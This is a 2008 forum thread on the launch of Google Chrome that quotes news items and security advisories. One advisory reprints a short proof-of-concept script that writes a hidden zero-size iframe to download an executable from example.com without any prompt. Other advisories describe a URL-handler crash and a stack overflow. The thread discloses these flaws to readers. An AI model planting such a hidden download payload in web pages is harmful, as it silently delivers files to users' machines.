Google launches internet browser

Started by Frands, September 02, 2008, 04:40:30 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

Frands

September 02, 2008, 04:40:30 PM
QuoteGoogle is launching an open source web browser to compete with Internet Explorer and Firefox.

The browser is designed to be fast, and to cope with the next generation of web applications that rely on graphics and multimedia.
http://news.bbc.co.uk/2/hi/technology/7593106.stm

http://www.bbc.co.uk/blogs/technology/2008/09/googles_chrome_and_the_browser.html

----

What I am a bit concerned about is this! :shock::(I'm joking)
QuoteWe decided it was important to work on building a javascript machine----which is excatly what the V8 Team in (Ã…rhus), Denmark did
Everything which is made in Aarhus, Denmark wont work properly :laughing: : :hysterical: :laughing:
Our greatest glory is not in never falling but in rising every time we fall.
- Confucius
-----
Trend Micro Internet Security


Home Forums:
https://www.landzdown.com/
http://securitygarden.blogspot.dk/
https://www.classicrockforums.com/

Corrine

#1
September 04, 2008, 01:56:02 AM
http://www.securiteam.com/windowsntfocus/5YP060UPFU.html

QuoteGoogle Chrome Browser Automatic File Download     3 Sep. 2008

Summary
Google's new Web browser (Chrome) allows files (e.g., executables) to be automatically downloaded to the user's computer without any user prompt.

Credit:
The information has been provided by nerex.
The original article can be found at: http://www.milw0rm.com/exploits/6355


Details
Exploit:
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

and not as serious

http://www.securiteam.com/securitynews/5TP010UPFU.html

QuoteGoogle Chrome Browser URL Handler Crash     3 Sep. 2008

Summary
An issue exists in how chrome behaves with undefined-handlers in chrome.dll version 0.2.149.27. A crash can result without user interaction. When a user is made to visit a malicious link, which has an undefined handler followed by a 'special' character, the chrome crashes with a Google Chrome message window "Whoa! Google Chrome has crashed. Restart now?". It crashes on "int 3" at 0x01002FF3 as an exception/trap, followed by "POP EBP" instruction when pointed out by the EIP register at 0x01002FF4.

Credit:
The information has been provided by Rishi Narang.
The original article can be found at: http://evilfingers.com/advisory/google_chrome_poc.php


Details

Vulnerable Systems:
* Google Chrome Browser version 0.2.149.27

PoC Working/Exploit:
Click for a demo (clicking will cause the browser to crash) HERE.

Note:  Link "HERE" at the end of the 2nd quote was unclickable with the link location showing as "evil:%" when I checked it.


Take a walk through the "Security Garden" -- Where Everything is Coming up Roses!

Remember - A day without laughter is a day wasted.
May the wind sing to you and the sun rise in your heart.

Frands

#2
September 06, 2008, 05:01:19 PM
INFO:
Quote
Google Chrome Stack Overflow in Title Tag When Saving Files Lets Remote Users Execute Arbitrary Code

http://www.securitytracker.com/alerts/2008/Sep/1020823.html
Our greatest glory is not in never falling but in rising every time we fall.
- Confucius
-----
Trend Micro Internet Security


Home Forums:
https://www.landzdown.com/
http://securitygarden.blogspot.dk/
https://www.classicrockforums.com/
Print
Go Up Pages1
User actions